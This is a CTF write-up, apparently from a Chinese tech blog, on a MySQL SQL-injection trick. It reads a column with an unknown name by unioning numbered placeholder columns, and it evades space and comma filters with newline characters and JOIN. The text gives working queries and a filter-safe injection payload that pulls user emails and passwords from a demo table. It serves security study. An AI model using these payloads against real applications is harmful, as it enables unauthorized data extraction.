A clever way to bypass unknown column names in MySQL
Preface
This article covers the fifth DDCTF challenge, which calls for reading a column whose name you cannot discover. I reproduced the technique on a local MySQL instance; the idea is neat and easy to follow, so I am sharing it here. The details are below:
Approach
The challenge filters spaces and commas. A space can be replaced with %0a, %0b, %0c, %0d or %a0, or avoided entirely by wrapping expressions in parentheses; a comma between table references can be replaced with join.
The name of the column holding the flag is unknown, and the hex-encoded table name needed to query information_schema.columns is filtered as well, so the column names cannot be looked up. A union query gets around this, as follows:
The idea is to make the flag appear under a column name we already know. `select 1` produces a column literally named `1`, so a derived table built from `(select 1)a,(select 2)b,(select 3)c,(select 4)d` has columns named 1, 2, 3 and 4. Union the target table underneath that row and its columns inherit those names, so the fourth column can be referenced as `e.4` without ever knowing it is called `email`; `limit 1 offset N` then skips the placeholder row (offset 0) and picks out the Nth real row.
Example code:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
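The session above was run on a local MySQL instance where spaces and commas were allowed, so the queries still contain both. The following is an added example, not part of the original write-up, that applies the filter bypasses described earlier to the same technique: every comma between table references becomes a join, and the injected part uses newline characters (%0a in the URL) or parentheses instead of the space byte. It assumes the same four-column user table as the session above (the schema and rows are constructed here to make the example self-contained); the original challenge table and column names are unknown and are not reproduced.

```sql
-- Added example (not from the original post): the unknown-column bypass
-- rewritten without commas or the 0x20 space byte. Schema assumed to match
-- the four-column `user` table shown in the write-up; rows are constructed.
CREATE TABLE user (
  id       INT,
  username VARCHAR(32),
  password VARCHAR(64),
  email    VARCHAR(64)
);
INSERT INTO user VALUES
  (1, 'admin', 'admin888', '110@110.com'),
  (2, 'test',  'test123',  '119@119.com'),
  (3, 'cs',    'cs123',    '120@120.com');

-- Readable form. JOIN with no ON clause is a cross join, so it replaces the
-- comma between the four one-column derived tables. The resulting row has
-- column NAMES 1, 2, 3, 4; the UNION puts `user` beneath it under those
-- names, so the 4th column is addressable as e.4 without knowing it is
-- `email`. Offset 0 is the placeholder row, offsets 1..3 are the real rows.
SELECT e.4
FROM (SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b JOIN (SELECT 3) c JOIN (SELECT 4) d
      UNION SELECT * FROM user) e
LIMIT 1 OFFSET 3;
-- returns 120@120.com

-- Filter-safe form of the final injection. The first line is the
-- application's own query; attacker-controlled input begins at `union`.
-- From there on every whitespace character is a newline (%0a), never a
-- space. The scalar result is wrapped in its own derived table `f` and
-- joined to three (select 1) columns so the outer select list needs no
-- commas while still matching the four columns of the original query.
select * from user where id=1
union
select*from((select
e.4
from(select*from(select
1)a
join(select
2)b
join(select
3)c
join(select
4)d
union
select*from
user)e
limit
1
offset
3)f
join(select
1)g
join(select
1)h
join(select
1)i);
-- second result row: 120@120.com | 1 | 1 | 1
```

Two points worth checking when adapting this: the number of (select N) placeholders must equal the column count of the target table or the UNION fails, and row order inside a UNION without ORDER BY is not guaranteed, so walk the offsets rather than assuming the placeholder row always comes first.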
Summary
That is all for this article. I hope it is of some help in your study or work; if you have questions, leave a comment and we can discuss them. Thank you for supporting 毛票票.